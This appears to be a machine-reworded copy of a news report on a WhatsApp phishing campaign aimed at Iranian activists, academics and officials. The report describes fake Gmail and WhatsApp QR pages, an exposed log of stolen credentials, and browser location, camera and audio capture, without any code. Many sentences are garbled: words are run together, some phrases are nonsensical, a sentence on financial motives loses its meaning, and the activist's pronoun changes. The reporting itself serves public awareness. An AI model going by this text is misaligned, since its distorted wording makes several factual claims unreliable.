On Tuesday, a British-based Iranian activist Nariman Gharib tweeted a redacted image of a phishing link sent to someone via a WhatsApp message.
“Don’t click on suspicious links,” Gharib warned. The activist, who has been following the digital side of Iran’s protests from afar, said the campaign was targeting people involved in Iran-related activities, such as himself.
This hacking campaign comes at a time when Iran is struggling the longest national internet shutdown in its historyas anti-government protests – and violent crackdowns – rage across the country. Since Iran and its closest adversaries are very active in offensive cyberspace (read: hacking people), we want to learn more.
Gharib shared the full phishing link with TechCrunch after the post, allowing us to obtain a copy of the source code of the phishing web page used in the attack. He is too show the writing of his opinion.
TechCrunch analyzed the source code of the phishing page, and with additional input from security researchers, we believe the campaign aims to steal Gmail and other online credentials, compromise WhatsApp accounts, and conduct surveillance by stealing location data, photos, and audio recordings.
It’s unclear whether the hackers are government-affiliated agents, spies, or cybercriminals — or all three.
TechCrunch also identified a way to view a real-time copy of all victim responses stored on the attacker’s server, which is left and accessible without a password. This data shows dozens of victims who accidentally entered their credentials into phishing sites, and then got hacked.
The list includes Middle East academics working in national security studies; Israeli drone maker boss; Lebanon’s senior cabinet minister; at least one journalist; as well as people in the United States or US phone numbers.
TechCrunch published our findings after validating many of Gharib’s reports. The phishing site is down now.
Inside the attack chain
According to Gharib, the WhatsApp message he received contained a suspicious link, which loaded a phishing site on the victim’s browser.
The link shows that the attackers are relying on a dynamic DNS provider called DuckDNS for their phishing campaign. Dynamic DNS providers allow people to connect web addresses that are easy to remember – in this case, a duckdns.org subdomain — to a server whose IP address may change frequently.
It’s not clear whether the attacker killed the phishing site on their own accord, or was caught and cut off by DuckDNS. We reached out to DuckDNS with a question, but owner Richard Harper asked us to file an abuse report.
From what we know, attackers use DuckDNS to mask the real location of the phishing page, possibly appearing as a genuine WhatsApp link.
The phishing page is actually hosted on alex-fabow.onlinedomain that was first registered in early November 2025. This domain has several other related domains hosted on the same dedicated server, and the domain names follow a pattern that suggests that the campaign is also targeting other virtual meeting room providers, such as meet-safe.online and whats-login.online.
We’re not sure what happens when the DuckDNS link is loaded in a victim’s browser, or how the link determines which specific phishing page it will load. It is possible that the DuckDNS link directs the target to a specific phishing page based on the information obtained from the user’s device.
The phishing page will not load in our web browser, preventing us from directly interacting with the page. However, reading the source code of the page allows us to better understand the attack method.
Gmail credentials and phone number phishing
Depending on the target, clicking the phishing link will open a fake Gmail login page, or ask for a phone number, and start a stream of attacks aimed at stealing passwords and two-factor authentication codes.
But the source code of the phishing page has at least one flaw: TechCrunch discovered that by modifying the URL of the phishing page in our web browser, we can see a file on the attacker’s server that keeps a record of every victim who has signed in with their credentials.
The file contains more than 850 records of information sent by victims during the attack. This note describes each part of the phishing flow that victims are involved in. This includes a copy of the username and password the victim entered on the phishing page, as well as incorrect entries and two-factor codes, effectively becoming a keylogger.
The records also contain each victim’s user agent, a text string that identifies the operating system and browser version used to view the website. This data shows that the campaign is designed to target Windows, macOS, iPhone and Android users.
The exposed files allow us to follow the attack flow step by step for each victim. In one case, the file appears to show the victim clicking on a malicious link, which opens a page that looks like a Gmail login window. The log shows the victim entering his email credentials several times until he entered the correct password.
The records show the same victim entered a two-factor authentication code sent to a text message. We can say this because Google sends the two-factor code in a specific format (usually G-xxxxxxdisplays a six-digit numeric code).
WhatsApp hijacking and browser data exfiltration
Beyond stealing credentials, these campaigns can also enable surveillance by tricking victims into sharing their device’s location, audio, and images.
In Gharib’s case, clicking on the link in the phishing message opened a fake WhatsApp-themed page in her browser, which displayed a QR code. The purpose of the hook is to trick the target into scanning a code on the device, ostensibly to access a virtual meeting room.
Gharib said the QR code was created by the attacker, and scanning or tapping it would directly link the victim’s WhatsApp account to a device controlled by the attacker, giving them access to the victim’s data. This is a long-known attack technique that abuses WhatsApp device linking featureand have been abused for target user Signal messaging application.
We asked Founder of Granite Runa Sandviksecurity researchers who work to secure at-risk individuals, to examine code copies of phishing pages and see how they work.
Sandvik discovered that when the page was loaded, the code would trigger a browser notification asking the user for permission to access the location (via navigator.geolocation), as well as photos and audio (navigator.getUserMedia).
If accepted, the browser will immediately send the person’s coordinates to the attacker, able to identify the victim’s location. The page will continue to show the victim’s location data every few seconds, as long as the page remains open.
The code also allows the attackers to record audio and take photos every three to five seconds using the device’s camera. However, we do not see any location, audio, or image data that has been collected on our servers.
Thoughts on victims, timing, and attribution
We do not know who is behind this campaign. What is clear is that the campaign was successful in stealing credentials from the victim, and it is possible that the phishing campaign may re-emerge.
Although we know the identity of some of the people in this cluster of victims who were targeted, we do not have enough information to understand the nature of the campaign. The number of victims infiltrated by this campaign (that we know of) is quite small – less than 50 individuals – and it affects seemingly ordinary people in the Kurdish community, as well as academics, government officials, business leaders, and other senior figures in the Iranian diaspora and the Middle East.
There may be more victims than we realize, which can help us understand who is being targeted and perhaps why.
This case could be a government-backed actor
It is unclear what motivated hackers to steal people’s credentials and hijack WhatsApp accounts, which could also help identify who is behind this hacking campaign.
Government-backed groups, for example, may want to steal email passwords and two-factor codes from high-value targets, such as politicians or journalists, in order to download private and confidential information.
This is applicable because Iran is now almost completely cut off from the outside world, and getting information in or out of the country is a challenge. The Iranian government, or foreign governments with an interest in Iranian affairs, may want to know who is interacting with Iranian influencers, and how.
So, the timing of this phishing campaign and who it targets can indicate an espionage campaign that aims to try to gather information about a narrow list.
We asked Gary Miller, a security researcher at Citizen Lab and an expert on mobile espionage, to also examine the phishing code and some of the data that appeared from the attacker’s server.
Miller said the attack “definitely (has) the hallmarks of an IRGC-related spearphishing campaign,” indicating highly targeted email hacks carried out by Iran’s Islamic Revolutionary Guard Corps (IRGC), a faction of Iran’s military known for carrying out cyber attacks. Miller points to a mix of indications, including the international scope of targeting victims, credential theft, abuse of popular messaging platforms like WhatsApp, and social engineering techniques used in phishing links.
This case may be a financially motivated actor
On the other hand, financially motivated hackers can use stolen Gmail passwords and two-factor codes of other high-value targets, such as company executives, to steal proprietary and sensitive business information from their inboxes. Hackers can also forcefully reset passwords from victims’ cryptocurrency and bank accounts to empty their wallets.
The focus of the campaign is to access the victim’s location and device media, but it is not uncommon for financially motivated actors, which cannot be used for images and audio recordings.
We asked Ian Campbell, a threat researcher at DomainTools, which helps analyze public internet records, to see the domain names used in the campaign to help us understand when it was first created, and if the domain was connected to other infrastructure that was known or identified previously.
Campbell discovered that the campaign was targeting victims in the midst of Iran’s nationwide protests, the infrastructure of which had been set up weeks earlier. He added that most of the domains related to this campaign were registered in early November 2025, and one related domain was created a few months ago in August 2025. Campbell described the domain as medium to high risk, and said that it is related to cybercrime operations driven by financial motivation.
An additional wrinkle is that the Iranian government has been known to outsource cyberattacks to criminal hacking groups, presumably to protect its involvement in hacking operations against its own citizens. US Treasury already sanctions on Iranian companies in the past to act as fronts for Iran’s IRGC and carry out cyberattacks, such as launching targeted phishing and social engineering attacks.
As Miller noted, “This makes the point that clicking on unwanted WhatsApp links, no matter how convincing, is a high-risk and unsafe practice.”
To contact this reporter securely, you can reach Signal via the username: zackwhittaker.1337
Lorenzo Franceschi-Bicchierai contributed reporting.